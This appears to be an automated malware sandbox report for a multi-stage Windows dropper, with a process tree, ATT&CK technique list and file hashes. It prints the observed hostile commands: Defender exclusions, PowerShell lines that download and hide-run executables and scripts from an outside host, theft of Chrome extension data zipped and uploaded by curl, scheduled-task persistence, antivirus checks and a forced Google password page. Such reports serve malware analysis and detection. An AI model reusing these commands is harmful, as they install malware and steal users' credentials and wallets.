- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Users\Admin\AppData\Local\Temp\is-ODVJL.tmp\i1A5m12.tmp"C:\Users\Admin\AppData\Local\Temp\is-ODVJL.tmp\i1A5m12.tmp" /SL5="$70230,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause raf_encoder_12526⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause raf_encoder_12527⤵
- System Location Discovery: System Language Discovery
PID:4352
-
-
-
C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"6⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4915056⤵
- System Location Discovery: System Language Discovery
PID:3492
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B6⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\491505\Dr.comDr.com B6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5340 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "8⤵
- System Location Discovery: System Language Discovery
PID:5616 -
C:\Windows\SysWOW64\net.exenet session9⤵
- System Location Discovery: System Language Discovery
PID:4448 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session10⤵
- System Location Discovery: System Language Discovery
PID:212
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "8⤵
- System Location Discovery: System Language Discovery
PID:5224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5944
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"9⤵
- System Location Discovery: System Language Discovery
PID:2320 -
C:\Windows\SysWOW64\xcopy.exexcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"10⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org10⤵
- System Location Discovery: System Language Discovery
PID:3088 -
C:\Windows\SysWOW64\curl.execurl -s https://api.ipify.org11⤵
- System Location Discovery: System Language Discovery
PID:5828
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"10⤵
- System Location Discovery: System Language Discovery
PID:5104 -
C:\Windows\SysWOW64\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"11⤵
- System Location Discovery: System Language Discovery
PID:436
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "8⤵
- System Location Discovery: System Language Discovery
PID:224 -
C:\Windows\SysWOW64\net.exenet session9⤵
- System Location Discovery: System Language Discovery
PID:5352 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session10⤵
- System Location Discovery: System Language Discovery
PID:5476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5956 -
C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"10⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 156⤵
- System Location Discovery: System Language Discovery
PID:3976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe"C:\Users\Admin\AppData\Local\Temp\1012579001\ca0fc6777c.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe"C:\Users\Admin\AppData\Local\Temp\1012580001\06d41594d9.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 15565⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 15405⤵
- Program crash
PID:5988
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe"C:\Users\Admin\AppData\Local\Temp\1012581001\38f25d7919.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:544
-
-
C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe"C:\Users\Admin\AppData\Local\Temp\1012582001\f672d1755a.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1292 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:4324
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {23b2cb8f-1c6d-4381-8cd3-7daa2f8a90f0} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" gpu7⤵PID:1296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {96fe4772-3a9a-49d3-a60c-1cec54ab547d} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" socket7⤵PID:4492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2852 -childID 1 -isForBrowser -prefsHandle 3052 -prefMapHandle 3188 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f40f1f6e-7072-41de-9b00-8caca0f945ae} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab7⤵PID:4248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3720 -childID 2 -isForBrowser -prefsHandle 3712 -prefMapHandle 3248 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd67499b-90d6-4efd-8c64-33c660d2a25b} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab7⤵PID:2272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4588 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4656 -prefMapHandle 4652 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dec769c-010a-47e0-afbd-06effc39b0b2} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" utility7⤵
- Checks processor information in registry
PID:5604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 3 -isForBrowser -prefsHandle 5356 -prefMapHandle 5360 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0326ba0f-dc49-45ac-847b-faa81ed8b460} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab7⤵PID:5484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eba1c74-f3c9-4423-b2d2-303e843cd14c} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab7⤵PID:5448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5768 -childID 5 -isForBrowser -prefsHandle 5676 -prefMapHandle 5680 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b708980d-98a0-4520-80b9-3c1841b4a63f} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab7⤵PID:5436
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe"C:\Users\Admin\AppData\Local\Temp\1012583001\08bf4e72b2.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3088
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2388 -ip 23881⤵PID:5944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2388 -ip 23881⤵PID:5956
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5476
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5844
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD56fa2809c262666dfee913609534a7fa0
SHA1ee6ede2c1e15cb21aa91b8331d133e8df35ce669
SHA2568290014e0ae88a06ec55533ea36f5079233aad64a93ad9f6ffa6bc98669b8fc4
SHA5127e415a4ffa4d5a26ebbbe6ed1f979ebe2669d85d11d5ad377e73533fa050e574bb4203f5219c9bffe4adea34d3b56a20a3453df05c7beb7b1bcd62fe8877d6b9
-
Filesize
18KB
MD559acab1c38385fc0db7c082eded508d0
SHA1d3cf0c503d9da87158d3612df20467b91f494ce7
SHA25637ce0422439f1f9df66fdbe8ef27f9c0b857b2af3deec04dc7869e3776976abc
SHA512d9a87147e5e9c5f091afb1f935271aaddb1119f0b54aeed48283574a126903ebc32ec8e9cfb54038ef1b8718c663c5deece897cceb695e5ac1722a91f95f656f
-
Filesize
16KB
MD5b8d4fcfa620e02fa1f0058a428207a50
SHA186c2d0db9a216cb74efa8068a5b6462ea242b5a1
SHA256b2c9a7fab38596c74b6bc403a0dda99062767d1f9158f79b0e6f434ee989ff9b
SHA512d41dcf31b2bbf70055868e380cb4613a62c879015a0b38f1cb841b056baf03a39bf77312a71baf0cd7ee9cf8e1a321aeea2ff4b63692e224ee87515e38cf913c
-
Filesize
16KB
MD57e5e4a1e733efcda7f1f3ed5f37eeeda
SHA1fad56faa3e9f7557ff4ddb95c582d8b619481700
SHA25607aa8f7b7c24a17ee4fff8c43f70181418b916de44797902f36f79f517626b32
SHA51205aca5c1ff1e4062176db8e0c7e98d46ee18773bd9f3562f6ad76eb2d0cf0adf9d3582465f26adcc204f8e9106794d980bd7e4c933b2300b22854c37b0b16ff2
-
Filesize
20KB
MD5fc6f3a970bada8da067066ab273ea02e
SHA1071896a5cca12e7f667d843fedc8b3379cf4b9ee
SHA25695e1e7818d773e3f3352b699da3adeab58967a3978bb37124ada821672cc4db4
SHA5121f08973c99f03025c28612141fb72715693a22c5bff9b66fe9efdaea96e721af10636666d75958f82955a6bdc74e548cf879de9a42583ecb9e0a6a4dcd3b2e5b
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\activity-stream.discovery_stream.json
Filesize28KB
MD5ead5d4e851b8ad6c7f093c9bf57fbaa2
SHA1f44773e3e9317ed3d3b65c77b46e0346dd27a544
SHA2568ed09395dff94a9ec738b95bd6876f83e94355e77ae68f9f678dbd0451d18e89
SHA512168e91b95fb21a392b0dad3fbabcb021b00916c80ceb9ffa9b9966305cfba5f13dae2d297000911b8b1f1e98b3e7184b9e015fdea59b82da4100fe97aa9ac95d
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
Filesize13KB
MD54ea865e4b2a07ca82d7c7445e72b83a2
SHA1f60ebcd18769f0daf7b47f672dab4447ccc5390e
SHA25692b8456c35996cfacb55ef8be276e2485382816d2130500d4008a8cfff3b4829
SHA512c9580bf1d963e93db77f9d74dba5fb0aa68735e59995913b81f23d5ef03ad45d3315beebc568209e6e80a58aafc88c9fac4937f1c2e9cd4b7a630a4dd42127c9
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308
Filesize9KB
MD5b20b731374913cd3de2d3f4dff56ce17
SHA18e5d01dd8d642365862923a4da1467e7fbb4e3df
SHA256cb747b1c4cb4ce619ac3cd9c3bc2c017e09f3c8351f1a4df8545242e94d00e3d
SHA5128f87cdd3e0f69f3f1e8a93cbabb0b25c404c732bbad8b38cc93a54e2d206e758070e33a0c7bbadbbe5e28ba86d71d0efdda591ff6c7740c0e8580c83a7253ccc
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lhmx4teg.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
2.8MB
MD5b466bf1dc60388a22cb73be01ca6bf57
SHA121eb9665e42d6c4a8d9e764627049b2a6e3a69a4
SHA256e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad
SHA5126cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2
-
Filesize
630KB
MD5e477a96c8f2b18d6b5c27bde49c990bf
SHA1e980c9bf41330d1e5bd04556db4646a0210f7409
SHA25616574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c
-
Filesize
3.4MB
MD53a16d0e4e4522073da3c8a5a9f9e790b
SHA17a42a21a348d2e49c67b426d333a5c354ed2c83e
SHA256ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e
SHA5121213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a
-
Filesize
6.9MB
MD5a67e34baacfca98f323981d3b0087f3b
SHA1d22ccae2971df83812acaebc750d9a2c87357fe5
SHA2566092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA51239c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d
-
Filesize
1.9MB
MD5623d073b8d01e00cbb5294ff07fe238a
SHA1c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824
-
Filesize
1.7MB
MD5d124690a731b9f9511d39dda3a5ef3d8
SHA126fc68f194903e93db04711c9524c442845b583c
SHA25647cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634
-
Filesize
5.0MB
MD5343a771efad9c921a3abb8d4201f6040
SHA1b142b17a0dfb82b75071950eba743d0150ad12ff
SHA2566d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2
-
Filesize
945KB
MD58746d7ddcd593e7a9a38016b27a6dde0
SHA1a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA5129d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52
-
Filesize
2.6MB
MD5fc6804a55358a117689dab9333fd0ee5
SHA1bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA2564decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA5126a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c
-
Filesize
6.3MB
MD50a1e63fc10dd1dbb8b2db81e2388bf99
SHA167ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
